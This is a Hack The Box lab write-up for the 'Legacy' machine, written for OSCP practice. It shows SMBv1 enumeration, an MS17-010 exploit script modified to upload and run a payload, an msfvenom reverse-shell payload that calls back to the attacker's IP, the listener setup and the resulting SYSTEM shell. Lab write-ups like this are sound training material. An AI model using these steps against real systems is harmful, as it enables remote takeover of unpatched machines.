Hack The Box - Legacy Writeup

4 minute read

image1

Description

I am doing this as part of my OSCP preparation. This is quite an easy box and only requires a single exploit to get root.

Enumeration

Add legacy to hosts and start an nmap scan.

Nmap

kali@kali:~$ nmap legacy.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 22:32 EDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.33s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 21.75 seconds

SMB

We have smb running on the machine. Do a quick version check.

kali@kali:~$ nmap --script smb-protocols -p445 legacy.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 22:52 EDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.33s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols:
|   dialects:
|_    NT LM 0.12 (SMBv1) [dangerous, but default]

Nmap done: 1 IP address (1 host up) scanned in 54.08 seconds

It seems to be running version 1 that is vulnerable to the infamous MS17-010 that caused wannacy attack.

Root Shell

We can search on exploit db to get a manually exploitable script.

I will be using this script and it requires an additional script mysmb.py that can be found here.

Lets look at the code to see what to change to get a shell.

The function smb_pwn, smb_send_file and service_exec are the ones we require.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
	print('creating file c:\\pwned.txt on the target')
	tid2 = smbConn.connectTree('C$')
	fid2 = smbConn.createFile(tid2, '/pwned.txt')
	smbConn.closeFile(tid2, fid2)
	smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
	with open(localSrc, 'rb') as fp:
		smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

# based on impacket/examples/serviceinstall.py
# Note: using Windows Service to execute command same as how psexec works
def service_exec(conn, cmd):
	import random
	import string
	from impacket.dcerpc.v5 import transport, srvs, scmr

Here the function smb_send_file can be used to create a file on the system and service_exec is used to execute a command.

We can create a payload using msfvenom and then execute it to get a shell.

Msfvenom

kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8081 -f exe -o /home/kali/Desktop/htb/legacy/shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: /home/kali/Desktop/htb/legacy/shell.exe

Now modify the script as per our need. We don’t need the first part where the script tests writing a file.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
	#print('creating file c:\\pwned.txt on the target')
	#tid2 = smbConn.connectTree('C$')
	#fid2 = smbConn.createFile(tid2, '/pwned.txt')
	#smbConn.closeFile(tid2, fid2)
	#smbConn.disconnectTree(tid2)
	
	smb_send_file(smbConn, 'shell.exe', 'C', '\shell.exe')
	service_exec(conn, r'C:\shell.exe')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

Start a listener and run the exploit.

kali@kali:~/Desktop/htb/legacy$ python ex.py legacy.htb
Target OS: Windows 5.1
Using named pipe: spoolss
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81b44230
SESSION: 0xe1a85a70
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe22d4bd0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe22d4c70
overwriting token UserAndGroups
Opening SVCManager on legacy.htb.....
Creating service AraA.....
Starting service AraA.....
The NETBIOS connection with the remote host timed out.
Removing service AraA.....
ServiceExec Error on: legacy.htb
nca_s_proto_error
Done

Start a multi/handler listener to get the connection.

kali@kali:~/Desktop/htb/legacy$ msfconsole

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'



       =[ metasploit v5.0.97-dev                          ]
+ -- --=[ 2043 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View all productivity tips with the tips command

msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit(multi/handler) > set lport 8081
lport => 8081
msf5 exploit(multi/handler) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:8081
[*] Command shell session 1 opened (10.10.14.5:8081 -> 10.10.10.4:1044) at 2020-08-02 23:05:42 -0400


(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd C:\
cd C:\
C:\>cd Docu*
cd Docu*

C:\Documents and Settings>cd Admin*
cd Admin*

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator

16/03/2017  09:07     <DIR>          .
16/03/2017  09:07     <DIR>          ..
16/03/2017  09:18     <DIR>          Desktop
16/03/2017  09:07     <DIR>          Favorites
16/03/2017  09:07     <DIR>          My Documents
16/03/2017  08:20     <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.400.692.224 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec91***************

And we have the flag. On to the next one

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.